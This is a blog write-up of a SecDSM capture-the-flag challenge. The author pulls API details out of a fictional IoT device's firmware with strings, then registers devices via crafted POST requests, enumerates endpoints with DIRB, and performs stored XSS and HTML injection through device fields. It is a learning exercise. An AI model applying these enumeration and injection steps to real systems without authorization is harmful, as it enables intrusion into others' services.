You've successfully subscribed to Antoinette Stevens
Great! Next, complete checkout for full access to Antoinette Stevens
Welcome back! You've successfully signed in.
Success! Your account is fully activated, you now have access to all content.
Success! Your billing info is updated.
Billing info update failed.

Internet of Sh**: SecDSM June MiniCTF

Antoinette Stevens
Antoinette Stevens

The June MiniCTF at SecDSM was all about an obscure IoT device and the API that controls it.

The challenge starts out on the website for an IOT device called LegitIOT that claims to have the very best security. The site is pretty simple and allows the user to place an order, read the FAQ, and download the firmware.
The first two are useless, so downloading the firmware is the route to go. After downloading the file, the first tool I run is Strings.
Snippet: Strings on firmware-latest.bin file

Calibration coefficients
Enter device name to begin setup
Enjoy your LegitBox
Begin setup by entering your location
Error: Invalid location (City, ST is supported format)
LegitBox setup complete
Enter device name
{"secret":"%s", "location":"%s", 
"name":"%s", "type":"%s", "date":"%s"}

POST %s/%s HTTP/1.0
post api/{endpoint}

Above, you'll notice the interesting bits from the firmware file, which includes information for how to interact with the IoT device's API. This is a good time to use a Burp Proxy or any tool you have to manipulate HTTP requests because you'll need to craft a post request to send to the server. I used a Firefox plugin called HTTP Requester on the advice of my coworker, Nick who also worked on the challenge with me. By posting to the API on the register-device endpoint we were able to add our device to the list of registered devices. We validated by GET'ing the list of devices from the devices API endpoint, found using DIRB. On the website for the IoT device, a counter incremented whenever a new device was registered and gave us an opportunity to try some injection.


In the above image we did a standard Cross Site Script (XSS) with alert('something').
Here, we did some HTML injection to get our names on the page.

The tricky part about this challenge was attempting to figure out the greatest date/time possible. It became a race with other teams because the registered devices were listed by latest date/time so whoever had the most recent date/time was prioritized at the top of the list and their code was what was shown on the page.

The listings following the ISO 8601 format, YYYY-MM-DDT00:00+00:00

* This challenge is currently offline *